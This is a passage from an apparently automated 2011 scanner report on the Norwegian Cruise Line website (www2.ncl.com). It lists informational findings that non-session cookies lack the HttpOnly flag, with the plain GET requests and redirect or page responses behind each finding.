The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/hawaii/ports/map HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/hawaii/ports/map
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:10 GMT
Content-Length: 263
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:10 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:10 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:10 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.123. http://www2.ncl.com/destination/hawaii/questions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/hawaii/questions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/hawaii/questions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/hawaii/questions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:16 GMT
Content-Length: 263
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:16 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:16 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:16 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.124. http://www2.ncl.com/destination/hawaii/stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/hawaii/stories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/hawaii/stories HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/hawaii/stories
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:16 GMT
Content-Length: 261
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:16 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:16 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:16 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.125. http://www2.ncl.com/destination/hawaii/vacations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/hawaii/vacations

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/hawaii/vacations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/hawaii/vacations
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:16 GMT
Content-Length: 263
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:16 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:16 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:16 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.126. http://www2.ncl.com/destination/pacific_coastal/excursions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/pacific_coastal/excursions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/pacific_coastal/excursions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/pacific_coastal/excursions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:19 GMT
Content-Length: 273
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:19 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:19 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:19 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.127. http://www2.ncl.com/destination/pacific_coastal/hotel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/pacific_coastal/hotel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/pacific_coastal/hotel HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/pacific_coastal/hotel
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:21 GMT
Content-Length: 268
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:21 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:21 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:21 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.128. http://www2.ncl.com/destination/pacific_coastal/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/pacific_coastal/overview

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/pacific_coastal/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/pacific_coastal/overview
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:18 GMT
Content-Length: 271
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:18 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:18 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:18 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.129. http://www2.ncl.com/destination/pacific_coastal/ports/map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/pacific_coastal/ports/map

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/pacific_coastal/ports/map HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/pacific_coastal/ports/map
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:20 GMT
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:20 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:20 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:20 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.130. http://www2.ncl.com/destination/pacific_coastal/questions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/pacific_coastal/questions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/pacific_coastal/questions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/pacific_coastal/questions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:24 GMT
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:24 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:24 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:24 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.131. http://www2.ncl.com/destination/pacific_coastal/stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/pacific_coastal/stories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/pacific_coastal/stories HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/pacific_coastal/stories
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:22 GMT
Content-Length: 270
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:22 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:22 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:22 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.132. http://www2.ncl.com/destination/pacific_coastal/vacations  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/pacific_coastal/vacations

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/pacific_coastal/vacations HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/pacific_coastal/vacations
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:24 GMT
Content-Length: 272
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:24 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:24 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:24 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.133. http://www2.ncl.com/destination/panama_canal/excursions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/panama_canal/excursions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/panama_canal/excursions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/panama_canal/excursions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:36 GMT
Content-Length: 270
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:36 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:36 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:36 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.134. http://www2.ncl.com/destination/panama_canal/hotel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/panama_canal/hotel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/panama_canal/hotel HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/panama_canal/hotel
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:45 GMT
Content-Length: 265
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:45 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:45 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:45 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.135. http://www2.ncl.com/destination/panama_canal/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/panama_canal/overview

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/panama_canal/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/panama_canal/overview
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:31 GMT
Content-Length: 268
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 03 Oct 2011 13:07:31 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:31 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:31 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.136. http://www2.ncl.com/destination/panama_canal/ports/map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/panama_canal/ports/map

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/panama_canal/ports/map HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/panama_canal/ports/map
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:39 GMT
Content-Length: 269
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:39 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:39 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:39 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.137. http://www2.ncl.com/destination/panama_canal/questions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/panama_canal/questions

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/panama_canal/questions HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/panama_canal/questions
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:08:02 GMT
Content-Length: 269
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:08:02 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:08:02 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:08:02 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.138. http://www2.ncl.com/destination/panama_canal/stories  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /destination/panama_canal/stories

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /destination/panama_canal/stories HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://www2.ncl.com/cruise-destination/panama_canal/stories
Cache-Control: max-age=1209600
Expires: Mon, 17 Oct 2011 13:07:56 GMT
Content-Length: 267
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 13:07:56 GMT
Connection: close
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:07:56 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:07:56 GMT; path=/; domain=ncl.com

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www2.ncl.com/cru
...[SNIP]...
12.139. http://www2.ncl.com/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /faq

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /faq HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.10
X-Drupal-Cache: HIT
ETag: "1317645036-1"
Cache-Control: public, max-age=0
Last-Modified: Mon, 03 Oct 2011 12:30:36 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
X-Ncl-SLog: 10.5.44.33
Content-Type: text/html; charset=utf-8
Vary: Cookie
Date: Mon, 03 Oct 2011 13:05:42 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: Cookie=R4252677480; path=/
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:42 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:42 GMT; path=/; domain=ncl.com
Content-Length: 83104

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.140. http://www2.ncl.com/freestyle-cruise/bon-voyage-gifts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/bon-voyage-gifts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/bon-voyage-gifts HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317637516-1"
Last-Modified: Mon, 03 Oct 2011 10:25:16 +0000
X-Ncl-SLog: 10.5.44.28
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:27 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:27 GMT; path=/; domain=ncl.com
Content-Length: 60158

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.141. http://www2.ncl.com/freestyle-cruise/casinos-at-sea/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/casinos-at-sea/overview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/casinos-at-sea/overview HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Drupal-Cache: HIT
ETag: "1317630853-1"
Last-Modified: Mon, 03 Oct 2011 08:34:13 +0000
X-Ncl-SLog: 10.5.44.29
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:05:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:05:47 GMT; path=/; domain=ncl.com
Content-Length: 43284

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
<!--[if IE 7 ]> <html lang="en" class="ie ie7"> <![endif]-->
<!--[if IE 8 ]> <html lang="en" class="ie ie8"> <![en
...[SNIP]...
12.142. http://www2.ncl.com/freestyle-cruise/cruise-rewards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.ncl.com
Path:   /freestyle-cruise/cruise-rewards

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /freestyle-cruise/cruise-rewards HTTP/1.1
Host: www2.ncl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Drupal-Cache: HIT
ETag: "1317635166-1"
Last-Modified: Mon, 03 Oct 2011 09:46:06 +0000
X-Ncl-SLog: 10.5.44.31
Content-Type: text/html; charset=utf-8
Cache-Control: public, max-age=14400
Date: Mon, 03 Oct 2011 13:06:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ak_location=US,CA,SANJOSE,807; expires=Mon, 10-Oct-2011 13:06:32 GMT; path=/; domain=ncl.com
Set-Cookie: Ncl_region=CA; expires=Mon, 10-Oct-2011 13:06:32 GMT; path=/; domain=ncl.com
Content-Length: 40322

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html lang="en" class="ie ie6"> <![endif]-->
